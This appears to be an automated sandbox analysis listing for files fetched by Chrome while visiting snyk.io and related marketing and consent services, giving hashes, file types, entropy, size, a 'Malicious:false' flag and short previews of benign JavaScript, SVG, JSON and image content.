                                                                                                                                                                                                                                                                                                              SHA1:97C264DC630C80461F73675041D50ECD9760D0C5
                                                                                                                                                                                                                                                                                                              SHA-256:23AAEB229C57F3DA16FF1786D890F81DD548CCEC78081B918C3B7AAA70827BA2
                                                                                                                                                                                                                                                                                                              SHA-512:FD74C8B2A82CC3A9E76BB7279D3D639315EF4C638CCCE9C8D1EDFD674266D123D44037551630E498579BCA3A1F0848954146CA7D80B41DAFF6B1EDD26D17842B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://js.driftt.com/core/assets/js/37.b6614199.chunk.js
                                                                                                                                                                                                                                                                                                              Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[37],{"+nxv":function(e,t,n){"use strict";n.d(t,"a",function(){return initAndBind});var r=n("zgdO"),i=n("usiZ");function initAndBind(e,t){!0===t.debug&&("undefined"===typeof __SENTRY_DEBUG__||__SENTRY_DEBUG__?r.c.enable():console.warn("[Sentry] Cannot initialize SDK with `debug` option using a non-debug bundle."));var n=Object(i.a)(),s=n.getScope();s&&s.update(t.initialScope);var a=new e(t);n.bindClient(a)}},"5g57":function(e,t,n){"use strict";n.d(t,"a",function(){return v}),n.d(t,"b",function(){return addGlobalEventProcessor});var r=n("WwEg"),i=n("jm9a"),s=n("nfbA"),a=n("uIJS"),o=n("wQh9"),c=n("26VM"),u=n("xqFT"),_=n("bTzN"),d=n("zgdO"),l=n("Iwrg"),p=n("2nP+"),f=n("Te+l"),v=function(){function Scope(){Object(a.a)(this,Scope),this._notifyingListeners=!1,this._scopeListeners=[],this._eventProcessors=[],this._breadcrumbs=[],this._attachments=[],this._user={},this._tags={},this._extra={},this._contexts={},this._sdkProcessingMetadata={}}r
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):4500
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.978943808794042
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:WNQdyfE+0X727zlk/7HuIxzHRmFEt0fu2YSoyIFSk:WNQdKEXXck/7HDZHIFEGfu2YSoJ
                                                                                                                                                                                                                                                                                                              MD5:8499C8E5F2C80A427F7695ACD9D4BCF9
                                                                                                                                                                                                                                                                                                              SHA1:64537A002BC1D700B3237856E3DD9A6A261C3C21
                                                                                                                                                                                                                                                                                                              SHA-256:C0E57C534E7FCE5E66FB419C269B97D436385A2C69B9F508EDF480EF60DEDF91
                                                                                                                                                                                                                                                                                                              SHA-512:C515A06EA4CB2FDAA9A0F65FF3E29E19E25782794EB80B5B23762BFB94712EB3C8E5DF3F1321E4DEC7DF218E803AC8DC295D7D01873A57B1E85B7DDCEC00A1CF
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://res.cloudinary.com/snyk/image/upload/v1685113188/logo-spotify.svg
                                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.<svg xmlns="http://www.w3.org/2000/svg" height="168px" width="559px" version="1.1" viewBox="0 0 559 168">. <path fill="#1ED760" d="m83.996 0.277c-46.249 0-83.743 37.493-83.743 83.742 0 46.251 37.494 83.741 83.743 83.741 46.254 0 83.744-37.49 83.744-83.741 0-46.246-37.49-83.738-83.745-83.738l0.001-0.004zm38.404 120.78c-1.5 2.46-4.72 3.24-7.18 1.73-19.662-12.01-44.414-14.73-73.564-8.07-2.809 0.64-5.609-1.12-6.249-3.93-0.643-2.81 1.11-5.61 3.926-6.25 31.9-7.288 59.263-4.15 81.337 9.34 2.46 1.51 3.24 4.72 1.73 7.18zm10.25-22.802c-1.89 3.072-5.91 4.042-8.98 2.152-22.51-13.836-56.823-17.843-83.448-9.761-3.453 1.043-7.1-0.903-8.148-4.35-1.04-3.453 0.907-7.093 4.354-8.143 30.413-9.228 68.222-4.758 94.072 11.127 3.07 1.89 4.04 5.91 2.15 8.976v-0.001zm0.88-23.744c-26.99-16.031-71.52-17.505-97.289-9.684-4.138 1.255-8.514-1.081-9.768-5.219-1.254-4.14 1.08-8.513 5.221-9.771 29.581-8.98 78.756-7.245 109.83 11.202 3.73 2.209 4.95 7.016 2.74 10.73
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):1789
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.335325170173568
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:0peTzSJmNVhRACGkx19WssLeU9sbSIwD/mz4wDFrrb623vNEI6h8yVWM:0mcs6CGkwssozwD/mkwDFrr22VZi8y1
                                                                                                                                                                                                                                                                                                              MD5:059D2CD48604D228C7750997C18B6A7E
                                                                                                                                                                                                                                                                                                              SHA1:23B99FB6A309E4B3121DCA8F946CE5C5BEC7A1D2
                                                                                                                                                                                                                                                                                                              SHA-256:06F745C3571F84A3D26083D84544B914497C6DEBDC0AD523345A1C217A9B41FE
                                                                                                                                                                                                                                                                                                              SHA-512:965F843397CA217A58CCA7E63230D6581DC6511A94B70BC41F3DF87A8312194023B92027FE10A780A9599367FE2F9CFE393418949712C342BB10F664C45CAFC2
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://go.snyk.io/index.php/form/XDFrame
                                                                                                                                                                                                                                                                                                              Preview:<!doctype html>.<html>. <head>. <title>Marketo Forms 2 Cross Domain request proxy frame</title>. <script src="//go.snyk.io/js/forms2/js/forms2.min.js"></script>. <script>. (function (){. var $ = MktoForms2.$;. if(!window.parent || window.parent == window){. return;. }. $(window).on("message", function (e){. var origin = e.originalEvent.origin;. var message = e.originalEvent.data;. try{. message = $.parseJSON(message); . }catch(ex){. return; //our messages are always JSON. }. if(message && message.mktoRequest && message.mktoRequest.ajaxParams){. var p = message.mktoRequest.ajaxParams;. var params = { type:"POST", dataType:"json", url:p.url, data:p.data, crossDomain:false, jsonp:false };. params.success = function (data){. window.parent.postMessage(JSON.stringify({. mktoResponse:{. "
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (35552), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):35552
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.272922801597397
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:zeUUsSi7WTPK47rBtSTECq0XBkpurOMiQvNvvFJcXkryfGvWzo2t8YnO676kg5+n:pYichBgol0XadAvFgOvHzUW7S
                                                                                                                                                                                                                                                                                                              MD5:C6F58DD3D60F07462254B842DD4F9CA1
                                                                                                                                                                                                                                                                                                              SHA1:62C507FC6CC05F9732BCD5C593F3D8D0E0A3D7E2
                                                                                                                                                                                                                                                                                                              SHA-256:2A8A441D8086F20A64563EDC759ABA1DE84D932E34FF77B8BB0279A730CDB428
                                                                                                                                                                                                                                                                                                              SHA-512:21BF35D36D4859188BF32B21F84B71975B72503C72F5B64D7AB98CEFB58045F3F991960CAF9E8BCC95CDC284C6758DB639B4087750206450076263677CA4513B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[9],{"+MLx":function(t,e,n){var r=n("HAuM");t.exports=function(t,e,n){if(r(t),void 0===e)return t;switch(n){case 0:return function(){return t.call(e)};case 1:return function(n){return t.call(e,n)};case 2:return function(n,r){return t.call(e,n,r)};case 3:return function(n,r,o){return t.call(e,n,r,o)}}return function(){return t.apply(e,arguments)}}},"/GqU":function(t,e,n){var r=n("RK3t"),o=n("HYAF");t.exports=function(t){return r(o(t))}},"07d7":function(t,e,n){var r=n("busE"),o=n("sEFX"),i=Object.prototype;o!==i.toString&&r(i,"toString",o,{unsafe:!0})},"0BK2":function(t,e){t.exports={}},"0Dky":function(t,e){t.exports=function(t){try{return!!t()}catch(e){return!0}}},"0GbY":function(t,e,n){var r=n("Qo9l"),o=n("2oRo"),i=function aFunction(t){return"function"==typeof t?t:void 0};t.exports=function(t,e){return arguments.length<2?i(r[t])||i(o[t]):r[t]&&r[t][e]||o[t]&&o[t][e]}},"0eef":function(t,e,n){"use strict";var r={}.propertyIsEnumerable,
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:gzip compressed data, was "tmpnxgs__sw", last modified: Tue Sep 17 11:17:00 2024, max compression, original size modulo 2^32 723647
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):197282
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.998361367101362
                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                              SSDEEP:6144:RFdkypYXFM57h1HXu06otoRTp5QiCej9Om:J98in13uBoq8iC89
                                                                                                                                                                                                                                                                                                              MD5:98BBE9F2D87D17908A6757F6D82CACD4
                                                                                                                                                                                                                                                                                                              SHA1:AD6CD0F0A49C630E94DEDA2CE51B4A2DB36D0F7E
                                                                                                                                                                                                                                                                                                              SHA-256:7EB6859FF68B9F5AAE69CD8D394924A3FBCB1C9754300939F2F01A5D3C43F2BC
                                                                                                                                                                                                                                                                                                              SHA-512:BE22A0CD266FB104FE539BCCF18067BF6F59C63EA6F52B03C25BDE17D28E0E1F1EDC77B9E27AB006D00C1A816DC81445FBBDD7E173B6BA37C507055340A7D295
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://app.usercentrics.eu/browser-ui/latest/bundle.js
                                                                                                                                                                                                                                                                                                              Preview:....,e.f..tmpnxgs__sw.....6.(.U...Y.a<I..=...8..y5N...zs..q.%W..Ic..~..!.d...s..M.I$A..A.....E0J.0...k..Z.D.(...{..%........7>J...}ls.._...'.w.I..y....gW.4.."..<.&Y_.#7._..G.....F<YDA.....G.?O..X..b.#.j.W..>_.7uo>..........t........n7..^4.0A..<.$7.hcC..w..t.....h.2_...f.....h.}..m9u...n..q....8..|.@s.O.0n..c~..\f.y.P.*..p.F.*.TV.=5.)...;....$Ep.C..5.v.U"V./Hi@TVH.Zknr?..u./..z.u.#..MA.| (...'.?......2oC.\.Zs.@.aP.y.).\Z.Mo1M,..B...&j&7QxW..]...Q.....O...l.'5Y.....[o..uK..pv.........8Z.x..6V.2..i."VL....aI+i..@.+.......C.?P#..KgGcm.....,..].'.y..2H...I.1..\...c...2o.+?..N..e5..._Iq~%j~...J.M=-k......0...../6.Q.-Ns.&.&....&I.b.d...3]......(.M...jj..._$.G.>.X......F...&pCh.K.>....:?.[....!.y0T$Q.WT..o.$......a.A..05......+..j..........F...!../...,.'....e../.q...f9...2....`....%..`t3\.......x..2..Y.mG.w_.c...j.b....Ha..mt..ij..%.Rv.]." ..p.q.J......s.O.8.u..b~D...{.EBy,..`v..j...+....w.~...;?u~...z..V.-r../[.....v.F.0K.1.,|}],o..y#.K.............
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):4217
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.278431400922646
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:RlN8NPssoFm8boZJToVprFhtHH7TkccP9M/bE0EWLlnLQEjKEUPnd71Tu1+yyP57:7NEXhBoVprJnPkLVcfnL8vd71q1+yyR
                                                                                                                                                                                                                                                                                                              MD5:2053C2DE3DBA4CED20108C506D6A8342
                                                                                                                                                                                                                                                                                                              SHA1:293464D848ADAF7AB8FDFE7C1239256D90F11197
                                                                                                                                                                                                                                                                                                              SHA-256:A1814E1FD4BB08755374B6EFB763FD8D86375F53B8A9CC0D482113A6DFE5DEC6
                                                                                                                                                                                                                                                                                                              SHA-512:8F269BCC841C28E58A81FC82C275F2DCB72106C9229CD4BCC2D0A55E152B6244FB820F0E6B1E5703C8C6CF4913C835BD630070DDA132CB21849D960DF8378E3A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:<svg width="226" height="80" viewBox="0 0 226 80" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_220_2238)">.<path d="M221.878 27.1037L215.101 23.226L208.227 19.2895C203.684 16.6848 198.004 19.9554 198.004 25.204V26.0853C198.004 26.5749 198.259 27.0253 198.69 27.2604L201.882 29.0817C202.763 29.5909 203.86 28.9446 203.86 27.9262V25.8307C203.86 24.7927 204.976 24.1464 205.877 24.6556L212.144 28.2592L218.392 31.8431C219.292 32.3523 219.292 33.6645 218.392 34.1736L212.144 37.7576L205.877 41.3611C204.976 41.8703 203.86 41.224 203.86 40.186V39.1481C203.86 33.8995 198.18 30.6093 193.637 33.2336L186.763 37.1701L179.987 41.0478C175.423 43.6721 175.423 50.272 179.987 52.8963L186.763 56.774L193.637 60.7105C198.18 63.3152 203.86 60.0446 203.86 54.796V53.9147C203.86 53.4251 203.605 52.9746 203.174 52.7396L199.982 50.9183C199.101 50.4091 198.004 51.0554 198.004 52.0738V54.1693C198.004 55.2073 196.888 55.8536 195.987 55.3444L189.72 51.7408L183.473 48.1569C182.572 47.6477 182
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65489), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):184787
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.091039649170436
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:f/m2fWmIh/eda5e7oW7lN4IIAQaznRN/rSMx5CjAAJElXt2:fu2fWvmWonCrJAXt2
                                                                                                                                                                                                                                                                                                              MD5:E1E48F2B6CF34F83DC3F4DF1F8C378C3
                                                                                                                                                                                                                                                                                                              SHA1:B575EC293E44A7646FA028A9518819AC4CF1C232
                                                                                                                                                                                                                                                                                                              SHA-256:AA019975C6868B97E1F44E8537BFEB55D36A08294B5D7D9E3F98794644C9CEE7
                                                                                                                                                                                                                                                                                                              SHA-512:476BFB981B60B35F60A344BB65BFDA529F84D1D308E502E619E0F577796F23AC51F2BF468DAD6A899F28674B70DB6B947754E1CC1A3F8AE1A97911D7C39C5483
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/careers.json?slug=careers
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"ckamtMcnDFiLPyIUsZ4hR","type":"Entry","createdAt":"2022-10-21T23:54:27.402Z","updatedAt":"2024-07-16T13:34:48.252Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":39,"revision":9,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"About Snyk - Careers","title":"Careers | Snyk","slug":"careers","uri":"careers","pageLocalization":["de","ja","fr"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"8uY8AETxksKZEnvgTFYXH","type":"Entry","createdAt":"2022-10-21T23:54:27.508Z","updatedAt":"2024-02-29T17:27:23.522Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":22,"revision":9,"contentType":
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):39131
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.955733109370803
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:iw/ARt09SIJmHZZHZB/+oDLJbMEBVA83Ft/u4Xgxq74qhxzaaUUHI6G6H:r2jxzaCG6H
                                                                                                                                                                                                                                                                                                              MD5:FDD0ACCE10A488D98C19936112AE4332
                                                                                                                                                                                                                                                                                                              SHA1:25BA5FF2BF8CB9E4D27F8508D273EB5794801284
                                                                                                                                                                                                                                                                                                              SHA-256:4BAAAE5B7B23B9E77FD0C2D11794B1DE3A08CDC0513BA678CF608A2942AAA890
                                                                                                                                                                                                                                                                                                              SHA-512:2239DEB178C6020A7072E47AAA19C6C85E10AA33648BEA0824530B12C50051591E513D4F87D311F55841922173AC72E8380A60E768D45D926338FC1B9DF99E91
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://api.usercentrics.eu/settings/Zz23KCbJ4/latest/en.json
                                                                                                                                                                                                                                                                                                              Preview:{"settingsId":"Zz23KCbJ4","version":"77.29.180","isLatest":true,"buttonDisplayLocation":"bl","moreInfoButtonUrl":"","actionClickOnViewConsentInSearchApp":"","layout":1,"privacyModal":1,"urlConsentInfo":"","stylesCss":"","buttonPrivacyOpenIcon":"","buttonPrivacyCloseIcon":"","buttonPrivacyOpenIconUrl":"https://img.usercentrics.eu/misc/icon-fingerprint.svg","bannerMobileDescription":"We and our partners are using technologies like cookies and process personal data in order to improve your experience. In case of sale of your personal information you may exercise your consumer right to opt-out by activating the toggle 'Do Not Sell My Personal Information' below.","consentSharingIFrameUrl":"","bannerMobileDescriptionIsActive":true,"controllerIdCookie":"","chipDisplayLocation":"rm","privacyButtonIsVisible":true,"chipIsVisible":false,"disableScriptIfBot":false,"consentSharingIFrameIsCustomUrl":false,"consentSharingIFrameIsActive":true,"iabConsentIsActive":false,"resetConsentsOnShowingInitialV
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3851
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.9742575533521984
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:krRL+ENiydxXOF4SQTWC+dHMdC7zpQXbarxSg5N0iuHRCjWFTf+oikOciY1eqqag:k9SHX4SQCxHMlea0Kf+hciYgqqaHymf0
                                                                                                                                                                                                                                                                                                              MD5:9B110B20354045BEE9AD8AAC5D4A43AA
                                                                                                                                                                                                                                                                                                              SHA1:878083352928F2CAFB749EB57C5B004881C9E169
                                                                                                                                                                                                                                                                                                              SHA-256:C558EB0A73E0B32DA311FFEAB73198FBFFBD80DE0573908B6BB2406C097923E8
                                                                                                                                                                                                                                                                                                              SHA-512:5AB74354B417EDCBCC32AAE420543B24DBB511303D29F0A29A23083B1DDC06CEE59C1CB23A19ACEF9FA963A03E3D2699428F93AA38F6E2166CA22FC639A4FC62
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:<svg width="362" height="48" viewBox="0 0 362 48" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M305.24 45.8414C306.041 45.8414 307.296 45.6717 307.922 45.4421V41.5595C307.124 41.7291 306.44 41.7865 305.811 41.7865C303.755 41.7865 302.784 40.7036 302.784 37.5046V2.61577H293.991V6.50091H297.989V37.7317C297.989 43.0442 300.102 45.8414 305.24 45.8414ZM317.117 37.7916V19.7458H323.111V15.8632H317.117V8.32744H312.321V15.8632H307.753V19.7458H312.321V38.0187C312.321 43.2712 314.662 45.8414 320.202 45.8414C321.057 45.8414 322.427 45.6717 323.111 45.4421V41.5595C322.198 41.7291 321.399 41.7865 320.658 41.7865C318.258 41.7865 317.117 40.9307 317.117 37.7916ZM239.804 19.0047C246.084 19.0047 249.338 23.4588 249.852 28.4269H229.241C229.813 23.0021 233.466 19.0047 239.804 19.0047ZM263.042 30.6526C263.042 23.9154 267.327 19.0621 273.378 19.0621C279.489 19.0621 283.656 24.0277 283.656 30.6526C283.656 37.2751 279.489 42.2457 273.378 42.2457C267.327 42.2457 263.042 37.3899 263.042 30.6526ZM338
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):8072
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.96560667680424
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:Cwue5Ei106sHZgkKIV4uKAC214WhwYiciDu1j5lQd9x3:CwdpTs5gkKIfKAJ1WYiFDqQPx3
                                                                                                                                                                                                                                                                                                              MD5:332867A181AAEA088B1E6EF02EF7839C
                                                                                                                                                                                                                                                                                                              SHA1:8790FFF40749ECEF238A2BB5F40A0232A9954F05
                                                                                                                                                                                                                                                                                                              SHA-256:B6360E71789F256CDC9F8D5D9C1C2207A5C6470FB294F41E807CE9CC904B787F
                                                                                                                                                                                                                                                                                                              SHA-512:2093643D34E77865EADF049F4CD08AE24E068CE7870A94DCB086F521E1F62AC38BF2DEAF727A22C1D6636242BD52841C3BA2CD3AE956598B9D5CE959FB13DF8C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1660155578%2Fwordpress-sync%2Fintuit-logo.png&w=580&q=75
                                                                                                                                                                                                                                                                                                              Preview:RIFF....WEBPVP8X........C.....ALPHK......m.2....q^.....t.........@2......]...r...x.d...<...R.yu..-"&.....nu.mO.|...v.%..h..V.k.C........a. *(.U...|G....>...bA.k..N.K..}.*..S.0..J%...J...{A.@....2.r.C.i9.....D......Bj\zH.xc.Hq.`.q.............F...+C...3.U..o...P.0..fY..............-..]....-..R...~..L...H............L.q..C.j>....eE..!._.a.... 5.(^b`....j>.Sb.s...a.o..N].Z...2#....#XaL.(.x...b.3o=HM'h.'}...A......"....f.x..:..;......j:.m.2.....j...""...X...S<.+......h...{!.k.v..r.g..b.q@,.....{:.;+.v..F..6......|..R.)..f......Z.x/..Z^.}.}..OC........tH0..(....Z..mZ...!...6..".N].Z.A.3V..?.o....j}E..."........ef..6.........~.<H.....A./..*.<go......L3*.*E..C.`.M...$(....1..R......b........P.:l..C..........1X5!..R.@......,.F.}W(.C..G.B..f.....Ea..S..d..C......NPE..P:o.1TR.....8...Hq...6._.i\.8.#."(.U..Q..D...!...EUt....^.9n..W.=...(..h....?..=6l..'(.%.@....$.\"( ...]Z.....C..I"X\.....8,Q...R.G.)....,K^.YbC.h..V.'...........c'...7.|4..
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (606)
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):11133
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.520280429902031
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:aCrC821ch80emIm9Db2M4GqZQ0M7jLQn2RC6yQEU+9my8M8iJAP3A/pFd0Pa9Sl4:aC2VzmX2TGeQj7Ha2RahU+9my8M8iJ3/
                                                                                                                                                                                                                                                                                                              MD5:EA7826F34518D7C2295738F39C7640FA
                                                                                                                                                                                                                                                                                                              SHA1:0095729B4BC2A580E4CE033993DAFE498DB87DF5
                                                                                                                                                                                                                                                                                                              SHA-256:68CC280CE370C6F1F51A4FC5950103FC38DF80A429552C549ADD04EBD8BD3A23
                                                                                                                                                                                                                                                                                                              SHA-512:E371BB3BAB334509BAA629DE564D37EBC7CA3CDDF059E33FE394A90856394AB318B26133D10BF9D3E47D83449F3C8242724C7850F58DC94A8F834666ACECD321
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://munchkin.marketo.net/163/munchkin.js
                                                                                                                                                                                                                                                                                                              Preview:/*. * Copyright (c) 2007-2023, Marketo, Inc. All rights reserved.. * See https://developers.marketo.com/MunchkinLicense.pdf for license terms. * Marketo marketing automation web activity tracking script. * Version: 163 r896. */. (function(l){if(!l.MunchkinTracker){var h=l.document,p=h.location,C=encodeURIComponent,y=!1,q=null,t=null,D=!1,v=null,E=[],u=function(b,a,c,d){try{var e=function(){try{c.apply(this,arguments)}catch(a){}};b.addEventListener?b.addEventListener(a,e,d||!1):b.attachEvent&&b.attachEvent("on"+a,e);E.push([b,a,e,d])}catch(f){}},U=function(b,a,c,d){try{b.removeEventListener?b.removeEventListener(a,c,d||!1):b.detachEvent&&b.detachEvent("on"+a,c)}catch(e){}},e=function(b){return"undefined"!==typeof b&&null!==.b},F=function(b,a){return b.className.match(RegExp("(\\s|^)"+a+"(\\s|$)"))},V=e(l.XMLHttpRequest)&&e((new l.XMLHttpRequest).withCredentials),s=function(b){var a=null,c;if(e(b))if(0===b.length)a="";else try{a=decodeURIComponent(b)}catch(d){c=b.indexOf("?");if(-1!==c)t
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65506), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):72690
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.115936100793728
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:/RhRMkrKdJlA0Oy0AbB/Gsi7HEMVvpxl+fm9re9PE8waMe:5hOoq3OyvB/Gs8Xr9faMe
                                                                                                                                                                                                                                                                                                              MD5:1F5568738962474D607CB5E26E825A20
                                                                                                                                                                                                                                                                                                              SHA1:E0FFAB73C422CC3E3E3FA8FCAFCC887D834B31BD
                                                                                                                                                                                                                                                                                                              SHA-256:5E9709E8FB37EA23F5A34CBB0EC35FA6C5702804BD498B0589F08577E04B9D33
                                                                                                                                                                                                                                                                                                              SHA-512:9B07FEC22D3D2E5654483B2153BBE2DA3FC8DDB89172F2BEED7A09FDE9D0ED76858EEDE86AC19B415F44B458DC04D33CE6BE445CDB551D4AAC2F38B6893F4602
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"7uibDFYTy0Em4tJh3ERCMI","type":"Entry","createdAt":"2022-12-12T22:31:29.545Z","updatedAt":"2023-09-22T18:09:20.596Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":46,"revision":15,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"What is Snyk? - Developer Security Platform page","title":"What is Snyk?","slug":"what-is-snyk","uri":"product","pageLocalization":["de","fr","ja","pt-BR"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"1sjy4giKCtd2J8hY2rEKXo","type":"Entry","createdAt":"2022-12-13T17:28:55.075Z","updatedAt":"2023-09-20T22:00:53.119Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publi
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):24
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.8868421881310122
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:HE9vZ6n:SMn
                                                                                                                                                                                                                                                                                                              MD5:0C5DAD92482D9A7C7C253510F5082465
                                                                                                                                                                                                                                                                                                              SHA1:534B458F99B4D0BB90C2CF2C4BB3703EF44A52BF
